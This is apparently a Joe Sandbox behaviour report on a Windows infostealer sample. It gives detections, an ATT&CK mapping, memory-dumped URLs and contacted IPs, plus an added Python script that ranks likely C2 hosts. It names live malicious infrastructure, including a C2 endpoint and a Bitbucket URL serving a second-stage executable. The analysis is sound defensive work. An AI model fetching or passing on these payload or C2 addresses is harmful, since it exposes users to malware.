                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAVJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeDirectory queried: number of queries: 1001
Source: Yara match | File source: Process Memory Space: Yh6fS6qfTE.exe PID: 7200, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Yh6fS6qfTE.exe PID: 7200, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a number in front of a technique is the count shown in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 2 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 34 Virtualization/Sandbox Evasion; 2 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Query Registry; 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 223 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
Yh6fS6qfTE.exe | 61% | ReversingLabs | Win32.Infostealer.Tinba
Yh6fS6qfTE.exe | 57% | Virustotal |
Yh6fS6qfTE.exe | 100% | Avira | TR/Crypt.TPM.Gen
Yh6fS6qfTE.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s3-w.us-east-1.amazonaws.com | 52.217.18.140 | true | false | | high
bitbucket.org | 185.166.143.50 | true | false | | high
observerfry.lat | 104.21.36.201 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
curverpluch.lat | true | | unknown
slipperyloo.lat | true | | unknown
tentabatte.lat | true | | unknown
manyrestro.lat | true | | unknown
bashfulacid.lat | true | | unknown
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high
observerfry.lat | true | | unknown
wordyfindy.lat | true | | unknown
https://observerfry.lat/api | true | | unknown
shapestickyr.lat | true | | unknown
talkynicer.lat | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1- | Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr | Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg | Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micro0 | Yh6fS6qfTE.exe, 00000000.00000003.1475916315.0000000001424000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514509667.000000000142F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700 | Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0 | Yh6fS6qfTE.exe, 00000000.00000002.1869447514.0000000000D5B000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi | Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aui-cdn.atlassian.com/ | Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3 | Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta | Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat:443/api | Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://bitbucket.org/ | Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website | Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org/G% | Yh6fS6qfTE.exe, 00000000.00000003.1605364436.0000000001441000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001441000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.5.dr | false | | high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64 | Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://observerfry.lat/ | Yh6fS6qfTE.exe, 00000000.00000002.1872268064.00000000013BA000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013C3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://ocsp.rootca1.amazontrust.com0: | Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875849808.00000000061F9000.00000002.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605121311.0000000005B5A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Yh6fS6qfTE.exe, 00000000.00000003.1404218755.0000000005BD2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dz8aopenkvv6s.cloudfront.net | Yh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | Yh6fS6qfTE.exe, 00000000.00000003.1428212702.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1427021454.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.cookielaw.org/ | Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | Yh6fS6qfTE.exe, 00000000.00000003.1403027357.0000000005B60000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                                                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://observerfry.lat/apicYh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://remote-app-switcher.stg-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000003.1605159088.0000000005B19000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605364436.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1605289915.0000000005B36000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1875264971.0000000005B39000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352742360.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://bbuseruploads.s3.amazonaws.com/Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
Map legend (share of contacted IPs per country): < 25% | 25% to 50% | 50% to 75% | > 75%

Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.36.201 | observerfry.lat | United States | 13335 | CLOUDFLARENET (US) | false
185.166.143.50 | bitbucket.org | Germany | 16509 | AMAZON-02 (US) | false
52.217.18.140 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02 (US) | false
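As an added example (not part of the Joe Sandbox report), the following Python triage script splits the fused URL-table rows back into their columns and joins them against the Contacted IPs table above. The point it demonstrates: of the many URLs dumped from process memory, only one belongs to a host the sample actually connected to and that Joe Sandbox has no reputation for (observerfry.lat), while the Mozilla and Ecosia strings are high-reputation and never contacted, which is what a stealer that reads Firefox profile data leaves behind. The sample name, the row layout and the abbreviated rows embedded below are taken from this report; the verdict labels and the parsing regex are my own assumptions about the extracted layout.

```python
import re
from urllib.parse import urlsplit

SAMPLE = "Yh6fS6qfTE.exe"

# One extracted URL row: the URL runs straight into the first
# "<sample>, <dump>.sdmp" source reference and the Malicious flag is glued
# onto the last ".sdmp"; the reputation value sits on the following line.
ROW_RE = re.compile(
    r"^(?P<url>.+?)"
    r"(?P<sources>" + re.escape(SAMPLE) + r", .*?\.sdmp)"
    r"(?P<malicious>true|false)$"
)

# Constructed from the report's URL table (dump lists abbreviated).
RAW_ROWS = [
    ("https://www.ecosia.org/newtab/Yh6fS6qfTE.exe, 00000000.00000003.1352567257.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, Yh6fS6qfTE.exe, 00000000.00000003.1352637653.0000000005AEB000.00000004.00000800.00020000.00000000.sdmpfalse", "high"),
    ("https://observerfry.lat/apicYh6fS6qfTE.exe, 00000000.00000003.1514826680.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse", "unknown"),
    ("https://remote-app-switcher.stg-east.frontend.public.atl-paas.netYh6fS6qfTE.exe, 00000000.00000002.1872620005.0000000001425000.00000004.00000020.00020000.00000000.sdmpfalse", "unknown"),
    ("https://bbuseruploads.s3.amazonaws.com/Yh6fS6qfTE.exe, 00000000.00000002.1872620005.00000000013E7000.00000004.00000020.00020000.00000000.sdmpfalse", "high"),
]

# Constructed from the report's "Contacted IPs" table: domain -> (IP, ASN).
CONTACTED = {
    "observerfry.lat": ("104.21.36.201", "AS13335 CLOUDFLARENET"),
    "bitbucket.org": ("185.166.143.50", "AS16509 AMAZON-02"),
    "s3-w.us-east-1.amazonaws.com": ("52.217.18.140", "AS16509 AMAZON-02"),
}


def parse_url_row(row_line: str, reputation_line: str) -> dict:
    """Split a fused URL-table row into url, list of memory dumps,
    malicious flag and reputation."""
    m = ROW_RE.match(row_line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row_line[:60]!r}")
    # Each source reference is "<sample>, <dump>.sdmp"; drop the sample
    # name and the separating commas to keep only the dump identifiers.
    dumps = [s.strip(" ,") for s in m.group("sources").split(SAMPLE + ",")]
    return {
        "url": m.group("url"),
        "dumps": [d for d in dumps if d],
        "malicious": m.group("malicious") == "true",
        "reputation": reputation_line.strip(),
    }


def triage(rows: list, contacted: dict = CONTACTED) -> list:
    """Rank parsed rows. A host the sample connected to and that carries no
    reputation is the strongest C2 candidate; an unknown-reputation string
    that was never contacted still deserves a look; everything else is a
    string found in memory, not evidence of a connection."""
    order = {"contacted+unknown": 0, "unknown": 1, "contacted": 2, "not-contacted": 3}
    ranked = []
    for r in rows:
        host = urlsplit(r["url"]).hostname or ""
        hit = host in contacted
        if hit and r["reputation"] == "unknown":
            verdict = "contacted+unknown"
        elif r["reputation"] == "unknown":
            verdict = "unknown"
        elif hit:
            verdict = "contacted"
        else:
            verdict = "not-contacted"
        ranked.append((verdict, host, r["url"]))
    ranked.sort(key=lambda t: (order[t[0]], t[1]))
    return ranked


def triage_report(raw_rows: list = RAW_ROWS) -> list:
    """Parse the embedded rows and return them ranked for review."""
    return triage([parse_url_row(line, rep) for line, rep in raw_rows])


if __name__ == "__main__":
    for verdict, host, url in triage_report():
        print(f"{verdict:18} {host:45} {url}")
```

The ranking deliberately ignores the report's own Malicious column, which is false for every row here, including the C2 host; the join with the Contacted IPs table is what separates a string that was merely read from disk from a host that received traffic.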
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579720
Start date and time: 2024-12-23 08:03:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 1s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Yh6fS6qfTE.exe (renamed because the original name is a hash value)
Original Sample Name: 6cb8e80fe23740dff137816a6572a5ba.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.182.143.212, 13.107.246.63, 20.109.210.53, 40.126.53.14
• Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Yh6fS6qfTE.exe, PID 7200, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big: too many NtOpenKeyEx calls found
• Report size getting too big: too many NtQueryDirectoryFile calls found
• Report size getting too big: too many NtQueryValueKey calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session; see the PCAPs for the complete data
Time | Type | Description
02:04:09 | API Interceptor | 24x Sleep call for process Yh6fS6qfTE.exe modified
02:05:03 | API Interceptor | 1x Sleep call for process WerFault.exe modified
Other samples that contacted the same IPs
Match | Associated Sample Name / URL | Detection | Threat Name
104.21.36.201 | ABnDy7rLFS.exe | malicious | LummaC, Stealc
